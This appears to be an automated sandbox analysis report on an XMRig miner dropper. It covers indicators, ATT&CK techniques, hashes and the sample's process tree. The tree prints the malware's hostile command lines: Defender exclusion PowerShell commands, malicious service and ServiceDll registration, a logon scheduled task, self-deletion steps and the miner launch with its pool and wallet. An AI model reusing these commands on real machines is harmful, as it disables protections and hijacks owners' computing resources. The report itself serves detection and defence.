xmrig | b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb

Analysis

max time kernel
146s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-12-2024 15:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

228c09c31156d45dfe94195bb34d1399.exe
Size

14.0MB
MD5

228c09c31156d45dfe94195bb34d1399
SHA1

20c6ce4757be1399032b2ac6873dc505c1d02839
SHA256

b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
SHA512

003557ad24f826143a50cce81b56489c7768951ecdfef9b01fe645f5453ae8cf36bd1b2b6e5e3bd8d27131cf3a2d54d20b7c699ae582e2528b65aee8a560f40c
SSDEEP

393216:hPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:hITk1

Score

10^/10

xmrig discovery execution miner persistence

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x00030000000006db-224.dat	family_xmrig
behavioral2/files/0x00030000000006db-224.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2040	powershell.exe
1748	powershell.exe
3460	powershell.exe
1948	powershell.exe
2744	powershell.exe
3716	powershell.exe
112	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\x272391\Parameters\ServiceDll = "C:\\Windows\\System32\\x272391.dat"	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
3528	printui.exe
4044	console_zero.exe
2704	x401384.dat

Loads dropped DLL 13 IoCs

pid	Process
3528	printui.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
1504	svchost.exe
4044	console_zero.exe
4044	console_zero.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
103	raw.githubusercontent.com
107	raw.githubusercontent.com
87	raw.githubusercontent.com
88	raw.githubusercontent.com
93	raw.githubusercontent.com
96	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ipinfo.io
38	ipinfo.io

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3124	cmd.exe
5000	ARP.EXE

Drops file in System32 directory 22 IoCs

description	ioc	Process
File created	\??\c:\windows\system32\winsvcf\x268091.dat	svchost.exe
File created	C:\Windows\System32\zlib1.dll	printui.exe
File created	C:\Windows\System32\libwinpthread-1.dll	printui.exe
File created	C:\Windows\System32\console_zero.exe	printui.exe
File created	C:\Windows\System32\libpq.dll	printui.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\winsvcf\winlogsvc	printui.exe
File created	C:\Windows\System32\libintl-9.dll	printui.exe
File created	C:\Windows\System32\ucrtbased.dll	printui.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\libcrypto-3-x64.dll	printui.exe
File created	C:\Windows\System32\x272391.dat	printui.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	\??\c:\windows\system32\winsvcf\x401384.dat	svchost.exe
File opened for modification	\??\c:\windows\system32\winsvcf\winlogsvc	svchost.exe
File created	\??\c:\windows\system32\winsvcf\WinRing0x64.sys	svchost.exe
File created	C:\Windows\System32\libcurl.dll	printui.exe
File created	C:\Windows\System32\libiconv-2.dll	printui.exe
File created	C:\Windows\System32\libssl-3-x64.dll	printui.exe
File created	C:\Windows\System32\vcruntime140d.dll	printui.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3924	sc.exe
4924	sc.exe

Embeds OpenSSL 2 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x000a000000023b9b-36.dat	embeds_openssl
behavioral2/files/0x000a000000023ba7-80.dat	embeds_openssl

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4172	timeout.exe
4476	timeout.exe
2844	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1500	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
372	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2744	powershell.exe
2744	powershell.exe
3716	powershell.exe
3716	powershell.exe
3024	228c09c31156d45dfe94195bb34d1399.exe
3024	228c09c31156d45dfe94195bb34d1399.exe
112	powershell.exe
112	powershell.exe
2040	powershell.exe
2040	powershell.exe
1748	powershell.exe
1748	powershell.exe
3460	powershell.exe
3460	powershell.exe
1948	powershell.exe
1948	powershell.exe
1504	svchost.exe
1504	svchost.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeLockMemoryPrivilege	2704	x401384.dat

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2704	x401384.dat

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3024 wrote to memory of 2216	3024	228c09c31156d45dfe94195bb34d1399.exe	82
PID 3024 wrote to memory of 2216	3024	228c09c31156d45dfe94195bb34d1399.exe	82
PID 2216 wrote to memory of 2744	2216	cmd.exe	84
PID 2216 wrote to memory of 2744	2216	cmd.exe	84
PID 3024 wrote to memory of 2648	3024	228c09c31156d45dfe94195bb34d1399.exe	85
PID 3024 wrote to memory of 2648	3024	228c09c31156d45dfe94195bb34d1399.exe	85
PID 2648 wrote to memory of 3716	2648	cmd.exe	87
PID 2648 wrote to memory of 3716	2648	cmd.exe	87
PID 3024 wrote to memory of 3180	3024	228c09c31156d45dfe94195bb34d1399.exe	88
PID 3024 wrote to memory of 3180	3024	228c09c31156d45dfe94195bb34d1399.exe	88
PID 3024 wrote to memory of 4740	3024	228c09c31156d45dfe94195bb34d1399.exe	90
PID 3024 wrote to memory of 4740	3024	228c09c31156d45dfe94195bb34d1399.exe	90
PID 4740 wrote to memory of 3528	4740	cmd.exe	92
PID 4740 wrote to memory of 3528	4740	cmd.exe	92
PID 3024 wrote to memory of 3060	3024	228c09c31156d45dfe94195bb34d1399.exe	93
PID 3024 wrote to memory of 3060	3024	228c09c31156d45dfe94195bb34d1399.exe	93
PID 3060 wrote to memory of 4172	3060	cmd.exe	95
PID 3060 wrote to memory of 4172	3060	cmd.exe	95
PID 3528 wrote to memory of 8	3528	printui.exe	96
PID 3528 wrote to memory of 8	3528	printui.exe	96
PID 8 wrote to memory of 112	8	cmd.exe	98
PID 8 wrote to memory of 112	8	cmd.exe	98
PID 3528 wrote to memory of 3296	3528	printui.exe	99
PID 3528 wrote to memory of 3296	3528	printui.exe	99
PID 3296 wrote to memory of 3924	3296	cmd.exe	101
PID 3296 wrote to memory of 3924	3296	cmd.exe	101
PID 3296 wrote to memory of 1500	3296	cmd.exe	102
PID 3296 wrote to memory of 1500	3296	cmd.exe	102
PID 3296 wrote to memory of 4924	3296	cmd.exe	103
PID 3296 wrote to memory of 4924	3296	cmd.exe	103
PID 3528 wrote to memory of 3828	3528	printui.exe	105
PID 3528 wrote to memory of 3828	3528	printui.exe	105
PID 3828 wrote to memory of 4044	3828	cmd.exe	107
PID 3828 wrote to memory of 4044	3828	cmd.exe	107
PID 3528 wrote to memory of 4356	3528	printui.exe	108
PID 3528 wrote to memory of 4356	3528	printui.exe	108
PID 3528 wrote to memory of 3120	3528	printui.exe	109
PID 3528 wrote to memory of 3120	3528	printui.exe	109
PID 3120 wrote to memory of 2844	3120	cmd.exe	112
PID 3120 wrote to memory of 2844	3120	cmd.exe	112
PID 4356 wrote to memory of 4476	4356	cmd.exe	113
PID 4356 wrote to memory of 4476	4356	cmd.exe	113
PID 4044 wrote to memory of 2904	4044	console_zero.exe	123
PID 4044 wrote to memory of 2904	4044	console_zero.exe	123
PID 2904 wrote to memory of 372	2904	cmd.exe	125
PID 2904 wrote to memory of 372	2904	cmd.exe	125
PID 1504 wrote to memory of 2688	1504	svchost.exe	126
PID 1504 wrote to memory of 2688	1504	svchost.exe	126
PID 2688 wrote to memory of 2040	2688	cmd.exe	128
PID 2688 wrote to memory of 2040	2688	cmd.exe	128
PID 1504 wrote to memory of 1840	1504	svchost.exe	129
PID 1504 wrote to memory of 1840	1504	svchost.exe	129
PID 1840 wrote to memory of 1748	1840	cmd.exe	131
PID 1840 wrote to memory of 1748	1840	cmd.exe	131
PID 1504 wrote to memory of 1356	1504	svchost.exe	132
PID 1504 wrote to memory of 1356	1504	svchost.exe	132
PID 1356 wrote to memory of 3460	1356	cmd.exe	134
PID 1356 wrote to memory of 3460	1356	cmd.exe	134
PID 1504 wrote to memory of 1844	1504	svchost.exe	135
PID 1504 wrote to memory of 1844	1504	svchost.exe	135
PID 1844 wrote to memory of 1948	1844	cmd.exe	137
PID 1844 wrote to memory of 1948	1844	cmd.exe	137
PID 1504 wrote to memory of 3124	1504	svchost.exe	138
PID 1504 wrote to memory of 3124	1504	svchost.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\228c09c31156d45dfe94195bb34d1399.exe
"C:\Users\Admin\AppData\Local\Temp\228c09c31156d45dfe94195bb34d1399.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3716
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c mkdir "\\?\C:\Windows \System32"
  2⤵
  PID:3180
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c start "" "C:\Windows \System32\printui.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Windows \System32\printui.exe
    "C:\Windows \System32\printui.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:8
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:112
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c sc create x272391 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x272391\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x272391.dat" /f && sc start x272391
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3296
    - - C:\Windows\System32\sc.exe
        
        sc create x272391 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        5⤵
        Launches sc.exe
        
        PID:3924
    - - C:\Windows\System32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\services\x272391\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x272391.dat" /f
        5⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:1500
    - - C:\Windows\System32\sc.exe
        
        sc start x272391
        5⤵
        Launches sc.exe
        
        PID:4924
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3828
    - - C:\Windows\System32\console_zero.exe
        
        "C:\Windows\System32\console_zero.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4044
      - C:\Windows\System32\cmd.exe
        
        cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2904
        
        C:\Windows\System32\schtasks.exe
        
        schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:372
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Windows\System32\timeout.exe
        
        timeout /t 14 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:4476
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3120
    - - C:\Windows\System32\timeout.exe
        
        timeout /t 16 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:2844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\228c09c31156d45dfe94195bb34d1399.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'G:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'H:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c arp -a
  2⤵
  - Network Service Discovery
  PID:3124
- - C:\Windows\system32\ARP.EXE
    arp -a
    3⤵
    - Network Service Discovery
    PID:5000
- C:\Windows\System32\cmd.exe
  cmd.exe /c x401384.dat -o zeph.2miners.com:2222 -u ZEPHsCzKB2ZGWC6JHdKvUo6G8wdTPeuwiAhEYfMqBjn7hAAhVe9gWjtFoboAMtrnHaeH7coq9UpVA1CCvkLHojHyWf2UXpBHHj7 --rig-id=rig_00 --max-cpu-usage=50
  2⤵
  PID:5100
- - \??\c:\windows\system32\winsvcf\x401384.dat
    x401384.dat -o zeph.2miners.com:2222 -u ZEPHsCzKB2ZGWC6JHdKvUo6G8wdTPeuwiAhEYfMqBjn7hAAhVe9gWjtFoboAMtrnHaeH7coq9UpVA1CCvkLHojHyWf2UXpBHHj7 --rig-id=rig_00 --max-cpu-usage=50
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2979eabc783eaca50de7be23dd4eafcf

SHA1
d709ce5f3a06b7958a67e20870bfd95b83cad2ea

SHA256
006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

SHA512
92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bi3uobqi.zfk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
